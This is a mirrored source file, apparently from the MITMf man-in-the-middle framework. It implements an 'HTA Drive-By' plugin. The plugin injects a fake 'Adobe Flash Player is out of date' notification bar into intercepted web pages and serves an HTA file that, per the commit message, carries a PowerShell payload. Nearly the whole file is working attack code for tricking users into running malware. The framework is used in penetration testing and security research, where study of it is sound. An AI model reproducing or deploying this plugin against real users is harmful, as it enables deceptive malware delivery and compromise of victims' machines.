mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-06 13:02:24 -07:00
5e2f30fb89
- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
56 lines
1.9 KiB
Python
56 lines
1.9 KiB
Python
# Copyright (c) 2014-2016 Marcello Salvati
|
|
#
|
|
# This program is free software; you can redistribute it and/or
|
|
# modify it under the terms of the GNU General Public License as
|
|
# published by the Free Software Foundation; either version 3 of the
|
|
# License, or (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful, but
|
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
|
|
import re
|
|
import flask
|
|
|
|
from plugins.plugin import Plugin
|
|
from plugins.inject import Inject
|
|
from core.servers.http.HTTPserver import HTTPserver
|
|
|
|
class HTADriveBy(Inject, Plugin):
|
|
name = 'HTA Drive-By'
|
|
desc = 'Performs HTA drive-by attacks on clients'
|
|
optname = 'hta'
|
|
ver = '0.1'
|
|
|
|
def initialize(self, options):
|
|
self.bar_text = options.text
|
|
self.ip = options.ip
|
|
Inject.initialize(self, options)
|
|
self.html_payload = self.get_payload()
|
|
|
|
server = HTTPserver().server
|
|
|
|
@server.route('/<hta_req>')
|
|
def client_request(hta_req):
|
|
if hta_req == "Flash.hta":
|
|
with open('./config/hta_driveby/Flash.hta') as hta_file:
|
|
resp = flask.Response(hta_file.read())
|
|
|
|
resp.headers['Content-Type'] = "application/hta"
|
|
return resp
|
|
|
|
def get_payload(self):
|
|
with open("./core/html/htadriveby.html", 'r') as file:
|
|
payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
|
|
payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
|
|
return payload
|
|
|
|
def options(self, options):
|
|
options.add_argument('--text', type=str, default='The Adobe Flash Player plug-in was blocked because it is out of date.', help="Text to display on notification bar")
|